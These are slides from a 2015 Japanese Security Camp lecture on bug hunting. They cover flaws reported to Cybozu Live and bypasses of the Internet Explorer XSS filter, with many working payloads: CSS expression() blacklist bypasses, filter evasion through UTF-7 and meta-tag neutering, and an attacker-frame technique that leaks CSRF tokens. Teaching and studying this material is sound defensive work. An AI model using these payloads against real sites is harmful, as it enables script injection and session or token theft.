SecurityCamp2015「バグハンティング入門」

24,491 views

Published on

セキュリティ・キャンプ全国大会2015の講義「バグハンティング入門」で使用したスライドです。

Published in: Technology
2 Comments
43 Likes
Statistics
Notes
  • @narendra0x00 Unfortunately, there are no plans to make the English version. I made these slides for Japanese students who attended to security training event called Security Camp.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Hello Masato, By any chance do you have English version of these slides ? Thanks.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
24,491
On SlideShare
0
From Embeds
0
Number of Embeds
16,834
Actions
Shares
0
Downloads
74
Comments
2
Likes
43
Embeds 0
No embeds

No notes for slide

SecurityCamp2015「バグハンティング入門」

  1. 1. SecurityCamp2015 バグハンティング入門 Masato Kinugawa
  2. 2. 講師紹介 名前 Masato Kinugawa 好きな 脆弱性 XSS 職業 会社員・公務員・自営業・ 学生・無職・その他 好きな 休日の 過ごし方 脆弱性を探すこと
  3. 3. 話すこと TARGET❶ サイボウズLive TARGET❷ XSSフィルター 脆弱性発見の発想をみていこう! 次のアプリや機能の実際のバグから
  4. 4. 脆弱性報酬制度 脆弱性の報告に賞金を支払う制度 ソフトウェア製品で実施しているもの Chrome/Firefox/IDA Proなど Webアプリケーションで実施しているもの Google/Facebook/Twitter/GitHub/Dropboxなど
  5. 5. 豆知識 小切手は換金手数料が高い
  6. 6. [注意] 一方で 善意の検査でも攻撃とみなされることもある ISPにインターネットを止められた人もいるらしい 検査するなら検査を歓迎しているところが無難 残念ながら国内で表明しているところはほとんどない 検査を歓迎している企業の一覧ページ https://hackerone.com/programs https://bugcrowd.com/list-of-bug-bounty-programs
  7. 7. サイボウズLive TARGET ❶
  8. 8. ハントするならサイボウズ! 賞金あり! 日本の企業で唯一報酬制度を実施(2015年8月現在) 検証環境で安心して検査できる 日本語で報告できる 丁寧に対応してくれる http://cybozu.co.jp/company/security/bug-bounty/ サイボウズの制度紹介ページ LINE Bug Bounty (期間限定:2015年8月24日 ~ 9月23日) http://linecorp.com/ja/security/bugbounty/ ++追記++
  9. 9. 過去に誰かにみつかった脆弱性 【CyVDB-なし】XSS(サイボウズLive IDEABOX) 【CyVDB-243】SessionFixation 【CyVDB-499】XSS(添付ファイル) 【CyVDB-500】XSS(IEのバグ) 【CyVDB-501】XSS(カテゴリ編集機能) 【CyVDB-502】XSS(書式編集機能) 【CyVDB-536】XSS(IEのバグ) 【CyVDB-555】DoS(チャット機能) 【CyVDB-552】XSS(コメント欄) 【CyVDB-553】CSS記述制限のバイパス 【CyVDB-676】iframe内に無関係のページを表示できる 【CyVDB-859】CSS記述制限のバイパス 【CyVDB-905】オープンリダイレクト 【CyVDB-954】閲覧状況の漏えい の
  10. 10. 過去に僕がみつけた脆弱性 【CyVDB-なし】XSS(サイボウズLive IDEABOX) 【CyVDB-243】SessionFixation 【CyVDB-499】XSS(添付ファイル) 【CyVDB-500】XSS(IEのバグ) 【CyVDB-501】XSS(カテゴリ編集機能) 【CyVDB-502】XSS(書式編集機能) 【CyVDB-536】XSS(IEのバグ) 【CyVDB-555】DoS(チャット機能) 【CyVDB-552】XSS(コメント欄) 【CyVDB-553】CSS記述制限のバイパス 【CyVDB-676】iframe内に無関係のページを表示できる 【CyVDB-859】CSS記述制限のバイパス 【CyVDB-905】オープンリダイレクト 【CyVDB-954】閲覧状況の漏えい の ド ヤ 😥
  11. 11. 過去に僕がみつけた脆弱性 【CyVDB-なし】XSS(サイボウズLive IDEABOX) 【CyVDB-499】XSS(添付ファイル) 【CyVDB-500】XSS(IEのバグ) 【CyVDB-501】XSS(カテゴリ編集機能) 【CyVDB-502】XSS(書式編集機能) 【CyVDB-536】XSS(IEのバグ) 【CyVDB-555】DoS(チャット機能) 【CyVDB-552】XSS(コメント欄) 【CyVDB-553】CSS記述制限のバイパス 【CyVDB-676】iframe内に無関係のページを表示できる 【CyVDB-859】CSS記述制限のバイパス 【CyVDB-905】オープンリダイレクト 【CyVDB-954】閲覧状況の漏えい の
  12. 12. 発見のきっかけ 竹迫さんがサイボウズのオフィス周辺のお店をま とめたGoogle MapsのURLをLiveで教えてくれた その下に謎の空のiframeが出現! http://maps.google.com/maps/ms?msid=XXX イメージ図:
  13. 13. 空のiframeが表示されるまで Google MapsのURLが張られると 自動でインライン展開する機能があった Liveは全てHTTPS化されているが、竹迫さんの張った http:から始まるMapsのURLをhttp:のままiframeへ 入れていた 混在コンテンツ(Mixed Content)として ブラウザがロードをブロック 空のiframeが表示!
  14. 14. 試す 受け取るURLの判断が雑だからこんなことに なっていると予想 とりあえずマップっぽいURLを投稿してみよう https://maps.google.example.com/ あれ…
  15. 15. これは… 「maps.google」がホストにあればロードを開始 無関係のホストをiframeにロードできてしまう! https://maps.google.example.com/
  16. 16. 考えられる影響 フィッシング 偽Google Mapsを埋め込んで操作させちゃう? top.location を書き換えることで、オープンリダ イレクト(相当)として利用 [注] location は例外的に異なるオリジンからも操作できる クリックジャッキング (試していないが)Live内はX-Frame-Options:sameorigin が指定されているので、うまくやればできたかも?
  17. 17. 過去に僕がみつけた脆弱性 【CyVDB-なし】XSS(サイボウズLive IDEABOX) 【CyVDB-499】XSS(添付ファイル) 【CyVDB-500】XSS(IEのバグ) 【CyVDB-501】XSS(カテゴリ編集機能) 【CyVDB-502】XSS(書式編集機能) 【CyVDB-536】XSS(IEのバグ) 【CyVDB-555】DoS(チャット機能) 【CyVDB-552】XSS(コメント欄) 【CyVDB-553】CSS記述制限のバイパス 【CyVDB-676】iframe内に無関係のページを表示できる 【CyVDB-859】CSS記述制限のバイパス 【CyVDB-905】オープンリダイレクト 【CyVDB-954】閲覧状況の漏えい の
  18. 18. こんなURLを発見 https://cybozulive.com/ideabox/loginDirect?redirectUrl=https%3A %2F%2Fcybozulive.com%2Fideabox%2Flist
  19. 19. おおまかな挙動のチェック アクセスするとログイン画面へ そこからログインすると、redirectUrl に指定したURL にLocation: ヘッダでリダイレクト リダイレクト先に指定できるURLはcybozulive.com内に 制限しようとしている様子 https://cybozulive.com/ideabox/loginDirect?redirectUrl=https%3A %2F%2Fcybozulive.com%2Fideabox%2Flist
  20. 20. 詳しく制限をみる リダイレクトの様子をひたすらみる: https://cybozulive.com/AAA /AAA //cybozulive.com/AAA https://xxxcybozulive.com/AAA https://example.com/cybozulive.com/AAA https://example.comcybozulive.com/AAA https://example.com@cybozulive.com/ https://cybozulive.com/ideabox/loginDirect?redirectUrl=[HERE]
  21. 21. だませたもの( の扱い ) https://example.com@cybozulive.com/ IEやChromeでは: https://example.com/@cybozulive.com/ FirefoxではBasic認証情報の一部: 次のURLにアクセスするとどうなる? 外部のホストへリダイレクトしてしまう
  22. 22. 過去に僕がみつけた脆弱性 【CyVDB-なし】XSS(サイボウズLive IDEABOX) 【CyVDB-499】XSS(添付ファイル) 【CyVDB-500】XSS(IEのバグ) 【CyVDB-501】XSS(カテゴリ編集機能) 【CyVDB-502】XSS(コメント欄) 【CyVDB-536】XSS(IEのバグ) 【CyVDB-555】DoS(チャット機能) 【CyVDB-552】XSS(コメント欄) 【CyVDB-553】CSS記述制限のバイパス 【CyVDB-676】iframe内に無関係のページを表示できる 【CyVDB-859】CSS記述制限のバイパス 【CyVDB-905】オープンリダイレクト 【CyVDB-954】閲覧状況の漏えい の
  23. 23. コメントには機能がたくさん 投稿されるhttp(s)なURLをリンク化 レスをリンク( >>1 >1 のような文字から ) 一部のHTMLタグやスタイルの使用 外部サービスの自動インライン表示 YouTube slideshare Flickr 添付ファイルのインライン展開 画像、テキストファイルの表示 音声ファイルの再生 Vimeo Cacoo Google Maps(直前の問題の修正と共に廃止)
  24. 24. 正しく動いてる? 組み合わせても正しく動く?
  25. 25. HTMLの要素/属性の制限 <a>a</a> <abbr>abbr</abbr> <acronym>acronym</acronym> <address>address</address> <applet>applet</applet> <area>area</area> <audioscope>audioscope</audioscope> <b>b</b> <base>base</base> <basefont>basefont</basefont> <bdo>bdo</bdo> <bgsound>bgsound</bgsound> <big>big</big> .... <a target="_blank" >a</a> <abbr >abbr</abbr> <acronym >acronym</acronym> <address >address</address> applet area audioscope <strong >b</strong> base basefont <bdo >bdo</bdo> bgsound <big >big</big> .... ひたすらタグを投稿して使えるものを観察 投稿
  26. 26. リンクの制限 http: https: ftp: mailto: file: <a href="http://example.com/">Link</a> スキームは以下にリストしたものしか使えない telnet: gopher: news: wais: ?!
  27. 27. スタイル部分はブラックリスト expression behavior / behaviour moz-binding include-source url absolute fixed content javascript: vbscript: data: <p style="AAA:AAA">test</p> 次の文字列を発見するとstyle属性ごと削除
  28. 28. スタイル部分、その他の処理 を削除 /* から */ までを削除 & を &amp;に置換 <p style="x:a/**/bc&"> <p style="x: abc&amp;;" > こんな風に 以下を投稿すると:
  29. 29. Liveが守りたいライン XSSは禁止(もちろん) Live内を閲覧しただけで任意のサイトへリクエ ストを発生させるようなものは禁止 要素/属性は安全なものをリストして許可 スタイル属性値は危険なものをリストして禁止 スクリプトの実行が可能なもの UIを著しく破壊するもの 任意のサイトへリクエストを発生させるもの これを破ればOK!
  30. 30. CSSの expression() CSSからJSを実行できるXSSer御用達機能 このおかげでCSS注入の危険が大きく上がる IEの古いドキュメントモード(<=IE7)で動作 IE11からはドキュメントモードにかかわらず動かない <p style="x:expression(alert(1))">
  31. 31. いろんなexpression() <p style=x:expression(alert(1))> <p style=x:expres/**/sion(alert(1))> <p style=x:expr0065ssion(alert(1))> <p style=x:expression(alert(1))> http://www.atmarkit.co.jp/ait/articles/0906/04/news111_2.html 教科書に載らないWebアプリケーションセキュリティ(3): [柔軟すぎる]IEのCSS解釈で起こるXSS (2/3) - @IT 昔は全角文字でも動いた: <p style=x:expression(alert(1))>
  32. 32. 【CyVDB-553】禁止文字列のバイパス❶ <p style="x:exp/*[0x0A]*/ression(alert(1))"> コメントの間に改行をはさむと コメントが除去されない!
  33. 33. 【CyVDB-859】禁止文字列のバイパス❷ コメントの間にU+2028(またはU+2029)を はさむとコメントが除去されない! <p style="x:exp/*[U+2028]*/ression(alert(1))">
  34. 34. expression()のひどいパース これでアラートが動く 今回はコメントやを消すのでギリギリでセーフ <p style="a:a/**/ression(alert(1))('')exp')"> IE CSS解析问题可致新的XSS Vectors http://wooyun.org/bugs/wooyun-2014-068564
  35. 35. 【CyVDB-552】禁止の考慮漏れ❶ <a title="data:text/html, <script>alert(document.domain)</script>" style="-o-link:attr(title);-o-link-source:current" href="http://example.com/">Click</a> Opera 12.x系のみ使える-o-link CSSからリンクを設定できる
  36. 36. HTML5 Security Cheatsheet こうしたテクが一覧されているCheatsheet https://html5sec.org/
  37. 37. 【CyVDB-954】禁止の考慮漏れ❷ <p style="filter:progid:DXImageTransform.Microsoft. AlphaImageLoader( src='https://example.com/', sizingMethod='scale')" >ABC IE9モードまで動くAlphaImageLoaderフィルター url()という形ではなく、src=から 外部リクエストを発生させることができる
  38. 38. HTTPLeaks HTTPリクエストを発生させるような要素/属性 を一覧する @cure53berlin によるプロジェクト https://github.com/cure53/HTTPLeaks
  39. 39. 現在のCSSのブラックリスト これで安心...?! expression behavior / behaviour moz-binding include-source url absolute fixed content 【NEW】-o-link 【NEW】AlphaImageLoader javascript: vbscript: data: <p style="AAA:AAA">test</p>
  40. 40. ハントの秘訣 [ 細かいことを気にしよう ] 些細なバグや特徴的な挙動 いちいち悪用できないか考える 僕は小さな気付きをメモするようにしている あとで脆弱性に繋がると気付くことも
  41. 41. 例えば、僕のメモ ftp:のURLで、存在しないディレクトリをスクリプトなど のリソースとしてよみこもうとするとダイアログがでる。 Firefoxのメモ( browser/firefox/bug.txt ) のNo41:
  42. 42. 例えば、僕のメモ サイボウズLiveのメモ( bugbounty/cybozu/live.txt ) : https://cybozulive.com/common/transactionTokenJsonDirect {"name":"org.apache.struts.taglib.html.TOKEN","value":"[TOKEN]"} GETでJSON形式でtokenが返ってくる。 ただContent-DispositionとX-Content-Type-Optionsあり。
  43. 43. 脆弱性を引き出すコツ[試す] とりあえず手を動かして試してみる いろんな文字を思いつく限り入力するだけでも気付き は得られる 読んだり考えたりするだけより身につく
  44. 44. 脆弱性を引き出すコツ[列挙] 同じ性質のものを列挙しておくと便利 例えばHTMLタグ 例えばHTTPLeaks 例えば様々なフォーマットのファイル 例えばブラウザで利用可能な文字コード パーツがたくさんあればアイデアに幅が生まれる 一度列挙しておけば必要なときそこをみるだけ http://l0.cm/encodings/table/
  45. 45. ☕ [Windowsの XSS Tips] F5 を押す 日本語入力でUnicodeのコードポイントを入力 前半終了、ちょっとひといき
  46. 46. 日本語入力でUnicodeのコードポイントを入力 😥 ド ヤ F5 を押す ☕ [Windowsの XSS Tips] 前半終了、ちょっとひといき
  47. 47. XSSフィルター TARGET ❷
  48. 48. ブラウザのXSS保護機能 XSS Auditor ChromeやSafariに搭載 XSSフィルター EdgeとIE(8から)に搭載 NoScript (ブラウザ標準ではないが)Firefoxのアドオン URLやPOSTデータの攻撃と疑わしい文字列に 反応し、ページを書き換えて攻撃を防止
  49. 49. 遮断できる文脈をみる 典型的なXSSがある状況を作って遮断できるか確認 Reflected XSS(テキスト部/属性内/文字列リテラルの中) DOM based XSS(document.write/innerHTML) Stored XSS
  50. 50. パターン1 Reflected XSS http://example.com/?q=<script>alert(1)</script> <html> <body> XSS HERE: <script>alert(1)</script> </body> </html> IE 遮断 Auditor 遮断 NoScript 遮断
  51. 51. http://example.com/?q="onmouseover=alert(1)// <html> <body> <input name="q" value=""onmouseover=alert(1)//"> </body> </html> パターン2 属性内 IE 遮断 Auditor 遮断 NoScript 遮断
  52. 52. http://example.com/?q=javascript:alert(1) <html> <body> <a href="javascript:alert(1)">Click</a> </body> </html> パターン3 リンク部分 IE 遮断 Auditor スルー NoScript 遮断
  53. 53. http://example.com/?q=";alert(1)// <body> <script> var q="";alert(1)//"; </script> </body> パターン4 文字列リテラル IE 遮断 Auditor スルー NoScript 遮断
  54. 54. パターン5 DOM based XSS - 1 http://example.com/#<img src=x onerror=alert(1)> <body> <script> document.write(location.hash); </script> </body> IE スルー Auditor 遮断 NoScript 遮断
  55. 55. パターン6 DOM based XSS - 2 http://example.com/#<img src=x onerror=alert(1)> <body> <script> document.body.innerHTML=location.hash; </script> </body> IE スルー Auditor スルー NoScript 遮断
  56. 56. パターン7 Stored XSS http://sns.example.com/hasegawa/ ... <div id="profile"> <script>alert(1)</script> </div> ... IE スルー Auditor スルー NoScript スルー
  57. 57. 機能の限界 全てのXSSを止めることはできない 止められるのは攻撃のヒントのある典型的なパターン 誤検知は無くせない 意図的に起こすこともできる
  58. 58. XSSフィルターをもっと知る XSSフィルターの動作の詳細は文書化されてい ない どんな文字列が遮断対象なのか具体的にみる バイナリを観察 URLにあれこれ入力して試す 通過できたらそれは想定外のバイパスかも? 遮断方法にも注目する ここからはIEのXSSフィルターに絞ってみていこう!
  59. 59. バイナリもヒントになる C:WindowsSystem32mshtml.dll を エディタで開いてみると...
  60. 60. {<BUTTON[ /+t].*?va{l}ue[ /+t]*=} {<fo{r}m.*?>} {<TEXTA{R}EA[ /+t>]} {<is{i}ndex[ /+t>]} {<INPUT[ /+t].*?va{l}ue[ /+t]*=} {<OPTION[ /+t].*?va{l}ue[ /+t]*=} {[ /+t"'`]{o}nccc+?[ +t]*?=.} {<EM{B}ED[ /+t].*?((src)|(type)).*?=} {<[i]?f{r}ame.*?[ /+t]*?src[ /+t]*=} {<.*[:]vmlf{r}ame.*?[ /+t]*?src[ /+t]*=} {<LI{N}K[ /+t].*?href[ /+t]*=} {<[?]?im{p}ort[ /+t].*?implementation[ /+t]*=} {<ME{T}A[ /+t].*?((http-equiv)|(charset))[ /+t]*=} {["'].*?[{,].*(((v|(u0076)|(166)|(x76))[^a-z0-9]*({a}|(u00{6}1)|(1{4}1)|(x{6}1))[^a -z0-9]*(l|(u006C)|(154)|(x6C))[^a-z0-9]*(u|(u0075)|(165)|(x75))[^a-z0-9]*(e|(u 0065)|(145)|(x65))[^a-z0-9]*(O|(u004F)|(117)|(x4F))[^a-z0-9]*(f|(u0066)|(146) |(x66)))|((t|(u0074)|(164)|(x74))[^a-z0-9]*({o}|(u00{6}F)|(1{5}7)|(x{6}F))[^a-z0- 9]*(S|(u0053)|(123)|(x53))[^a-z0-9]*(t|(u0074)|(164)|(x74))[^a-z0-9]*(r|(u007 2)|(162)|(x72))[^a-z0-9]*(i|(u0069)|(151)|(x69))[^a-z0-9]*(n|(u006E)|(156)|( x6E))[^a-z0-9]*(g|(u0067)|(147)|(x67)))).*?:} "'{:, {<a.*?hr{e}f} {["'].*?{)}[ ]*(([^a-z0-9~_:'" ])|(in)).+?{(}} タグらしき文字列が、
  61. 61. {<sc{r}ipt.*?[ /+t]*?((src)|(xlink:href)|(href))[ /+t]*=} {<sc{r}ipt.*?>} {<AP{P}LET[ /+t>]} {<OB{J}ECT[ /+t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+t]*=} {<BA{S}E[ /+t].*?href[ /+t]*=} {[ /+t"'`]data{s}rc[ +t]*?=.} {<st{y}le.*?>.*?((@[i])|(([:=]|(&[#()[].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(]|(&[#()[].]x?0* ((40)|(28)|(92)|(5C));?))))} {[ /+t"'`]st{y}le[ /+t]*?=.*?([:=]|(&[#()[].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(]|(&[#()[].] x?0*((40)|(28)|(92)|(5C));?))} {(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|( newline;))))*{(b|(&[#()[].]x?0*((66)|(42)|(98)|(62));?))}([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D );?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73));?))([t]|(&(([#()[].]x?0*(9|(13 )|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].] x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|(52)|(114)|(72));?))([t]|( &(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69 ));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[].]x?0*((80)|(50 )|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x? 0*((84)|(54)|(116)|(74));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*)?(:| (&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).} {(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(n ewline;))))*(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);? )|(tab;)|(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(([#()[].]x?0*(9|(13)| (10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x? いっぱい!
  62. 62. <html> <body> <input name="q" value="[XSS_HERE]"> </body> </html> 属性注入の遮断例 {[ /+t"'`]{o}nccc+?[ +t]*?=.} "onxxx=a "#nxxx=a イベントハンドラっぽい文字列を書き換え
  63. 63. 危険なリンクの遮断 {(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&(([#()[].]x?0*( 9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&[#()[].]x?0*((66)|(42) |(98)|(62));?))}([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(ne wline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73));?))([t]|(&(([#() [].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&[#()[].]x?0* ((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|( tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|(52)|(114)|(72));?))([t]| (&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&[#()[ ].]x?0*((73)|(49)|(105)|(69));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(p|(&[#()[].]x?0*((80)|(50)|(112)|(70)); ?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t |(&[#()[].]x?0*((84)|(54)|(116)|(74));?))([t]|(&(([#()[].]x?0*(9|( 13)|(10)|A|D);?)|(tab;)|(newline;))))*)?(:|(&(([#()[].]x?0*((58)|(3A) );?)|(colon;)))).} javascript:a vbscript:a vbs:a javasc#ipt:a v#script:a v#s:a
  64. 64. 文字列リテラルの遮断 ()を使った関数呼び出し等は禁止 ";abc()// プロパティアクセス後の代入は禁止 ";a.b=// ";a["b"]=// プロパティアクセスの無い代入は許容 ";abc=// ただし一部の危険な代入は禁止 ";location=// 変形もNG: ";locu0061tion=// ";name=// ";onerror=// ";valueOf=// <script> var q="[XSS_HERE]" </script>
  65. 65. 遮断後 <script> var q="[XSS_HERE]" </script> ()を使った関数呼び出し等は禁止 ";abc##// プロパティアクセス後の代入は禁止 ";a#b=// ";a#"b"#=// プロパティアクセスの無い代入は許容 ";abc=// ただし一部の危険な代入は禁止 ";lo#ation=// 変形もNG: ";lo#u0061tion=// ";na#e=// ";on#rror=// ";va#ueOf=//
  66. 66. 危険な代入の攻撃例 ";location='javascript:alert(1)'// ";name=document.cookie// ";onerror=eval;throw'alert(1)'// ";valueOf=alert;~window// (多分こんなかんじ?) 追記: element.click()等がcallできるようだ、検証ページ
  67. 67. バイパスに挑戦してみよう 状況次第ではバイパスも可能?! 想定解のある簡単な(?)問題を作ってみました IEのXSSフィルターをバイパスしてalert(1)を出そう! http://tinyurl.com/camp2015xss http://tinyurl.com/camp2015xss2
  68. 68. 忘れ去られた機能でバイパス(2010) IE8 xss filter bypass (xss过滤器绕过) http://www.wooyun.org/bugs/wooyun-2010-013883 <div id=x>a <xml:namespace prefix=t> <import namespace=t implementation=#default#time2> <t:set attributename=innerHTML targetElement=x to=&lt;img src=x:x onerror =alert(1)&gt;> これがいま話題の HTML Imports...(違 {<[?]?im{p}ort[ /+t].*?implementation[ /+t]*=} 現在はフィルタ済:
  69. 69. 追加された機能でバイパス(2015) Edgeから追加されたES6の文法を使ったバイ パスが既に指摘されている テンプレートリテラル ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else / Mario Heiderich http://www.slideshare.net/x00mario/es6-en/34 ";alert`1`// ES6のユニコードエスケープ ";locu{61}tion=//
  70. 70. 仕様を利用した自明なバイパス XSSフィルターは同一オリジンのリンクから開 始したリクエストを遮断対象としない これは誤検知を少しでも減らすための仕様と思われる 同一オリジンにリンクを作れるならバイパス可 つまり 例:サイボウズLiveにReflected XSSがあったなら..
  71. 71. この挙動を利用したバイパス Reflected XSS自身でReflected XSS実行用リンクを作る XSSフィルターの元担当者David曰く「この変更やめた方が良い」 https://twitter.com/randomdross/status/552949854591127552 余談: 現在は "<a href" も遮断される: {<a.*?hr{e}f} <a href="?q=%3Cscript%3Ealert%281%29%3C/script%3E">XSS</a> http://example.com/xss?q=<a+href="?q=%253Cscript%253Ealert%25281%2529 %253C/script%253E">XSS</a> クリック 同一オリジンのリンクなのでXSSフィルターはスルー スクリプトが実行される
  72. 72. XSSフィルターでXSS(2010) かつて、遮断方法が適切でなかったため、 脆弱性がない部分からXSSを作れていた! Universal XSS via IE8s XSS Filters / Eduardo Vela Nava & David Lindsay https://media.blackhat.com/bh-eu- 10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8- XSS-Filters-slides.pdf <img src="http://example.com/onerror=alert(1)//"> <img src#"http: example.com onerror=alert(1)//"> 遮断後
  73. 73. 遮断を使ってバイパス(2012) "<a href=javascript&.x3A;alert&(x28;1&)x29;//=>XSS なにが起きる? ";abc()// 区切り 関数の実行 ";a.b=// 区切り プロパティアクセス後の代入
  74. 74. 遮断を使ってバイパス(2012) "<a href=javascript&.x3A;alert&(x28;1&)x29;//=>XSS ブラウザのXSS保護機能をバイパスする(3) http://masatokinugawa.l0.cm/2012/09/xss3.html "<a href=javascript:alert(1)//=>XSS 遮断後 遮断によってjavascript:のリンクに! : : ( ( ) )
  75. 75. ドキュメントモードが高いので動かない... サイボウズLiveで実際にできたもの。 expression()は書けたものの... <meta http-equiv="X-UA-Compatible" content="IE=edge" /> ・・・ <p style="x:exp/*[0x0A]*/ression(alert(1))"> https://cybozulive.com/xss フィルターを攻撃へ活用する
  76. 76. metaタグが破壊されドキュメントモードが降格 ありがとうXSSフィルター! 😉 そんなときこそXSSフィルター! https://cybozulive.com/xss?<meta+http-equiv=> <m#ta http-equiv="X-UA-Compatible" content="IE=edge" /> ・・・ <p style="x:exp/*[0x0A]*/ression(alert(1))"> フィルターを攻撃へ活用する
  77. 77. フィルターを攻撃へ活用する HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Aug 2015 14:34:24 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding Cache-Control: private X-Cybozu-Status-Code: 200 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=315360000; includeSubDomains; preload; X-UA-Compatible: IE=Edge X-Content-Type-Options: nosniff Content-Length: 143557 現在はヘッダでも指定している模様
  78. 78. 文字コードを使ったバイパス HTTP/1.1 200 OK Content-Type: text/html <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> </head> <body> XSS HERE: <meta charset=utf-7>+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxA CkAPAAvAHMAYwByAGkAcAB0AD4- </body> </html> http://example.com/xss?q=<meta+charset=utf-7>%2BADwAc wBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwBy AGkAcAB0AD4- 選択されるcharset
  79. 79. 文字コードを使ったバイパス http://example.com/xss?q=<meta+charset=utf-7>%2BADwAc wBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwBy AGkAcAB0AD4-&<meta+http-equiv=> HTTP/1.1 200 OK Content-Type: text/html <!DOCTYPE html> <html> <head> <m#ta http-equiv="Content-Type" content="text/html;charset=UTF-8"> </head> <body> XSS HERE: <meta charset=utf-7>+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxA CkAPAAvAHMAYwByAGkAcAB0AD4- </body> </html> 選択されるcharset
  80. 80. 文字コードを使ったバイパス +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAA vAHMAYwByAGkAcAB0AD4- <script>alert(1)</script> UTF-7からデコード {<ME{T}A[ /+t].*?((http-equiv)|(charset))[ /+t]*=} 現在は "<meta charset=" も遮断
  81. 81. 遮断後 <script> var q="";if#1#{true}else{false}//" </script> <form name=form> <input type=hidden name=token value=f9d150048b> </form> <script> var q="";if(1){true}else{false}//" </script> if文は遮断される 三項演算子 & デクリメント演算子 でバイパス(2014)
  82. 82. <form name=form> <input type=hidden name=token value=f9d150048b> </form> <script> var q="";1?true:false//" </script> if(1){true}else{false} 同じ意味 1?true:false 三項演算子は遮断されない 三項演算子 & デクリメント演算子 でバイパス(2014)
  83. 83. 遮断後 <script> var q="";lo#ation=location-1//" </script> <form name=form> <input type=hidden name=token value=f9d150048b> </form> <script> var q="";location=location-1//" </script> locationへの代入は遮断される 三項演算子 & デクリメント演算子 でバイパス(2014)
  84. 84. <form name=form> <input type=hidden name=token value=f9d150048b> </form> <script> var q="";location--//" </script> デクリメント演算子なら遮断されない location=location-1 location-- 同じ意味 三項演算子 & デクリメント演算子 でバイパス(2014)
  85. 85. <form name=form> <input type=hidden name=token value=f9d150048b> </form> <script> var q="";"a"==form.token.value[0]?top.TRUE.location. search--:top.FALSE.location.search--//" </script> こんなふうにもかいても遮断されない if("a"==form.token.value[0]){ top.TRUE.location.search--; }else{ top.FALSE.location.search--; } 以下と同じ意味 三項演算子 & デクリメント演算子 でバイパス(2014)
  86. 86. if("a"==form.token.value[0]){ top.TRUE.location.search--; }else{ top.FALSE.location.search--; } <iframe src=http://victim/ id=TRUE></iframe> <iframe src=http://victim/ id=FALSE></iframe> <iframe src=http://victim/xss?q=";[code]//></iframe> http://attacker/exploit.html top.*はそれぞれ、親の持つ別のフレームを参照させている 三項演算子 & デクリメント演算子 でバイパス(2014)
  87. 87. if("a"==form.token.value[0]){ top.TRUE.location.search--; }else{ top.FALSE.location.search--; //こっちへ } tokenの1文字目は「a」ではないので偽の分岐へ top.FALSE.location.search = top.FALSE.location.search - 1 以下が実行されることにより、 FALSEのフレーム内でナビゲーションが発生 http://victim/ http://victim/?-1 navi 三項演算子 & デクリメント演算子 でバイパス(2014)
  88. 88. 攻撃者は TRUE・FALSE、それぞれのフレームに loadのイベントリスナを設定しておく この時点で攻撃者は「tokenの1文字目はaでない」と知れる 今回であればまずFALSEのフレームの遷移でloadが発生する token取得のデモ: http://l0.cm/xssfilter_bypass/ 条件部を "b"==form.token.value[0] のように変えて 試行を繰り返していけば、tokenの取得も可能 三項演算子 & デクリメント演算子 でバイパス(2014)
